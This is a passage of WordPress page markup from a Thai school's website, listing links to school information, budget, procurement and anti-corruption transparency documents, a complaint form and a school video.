data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\" data-type=\"link\" data-id=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery 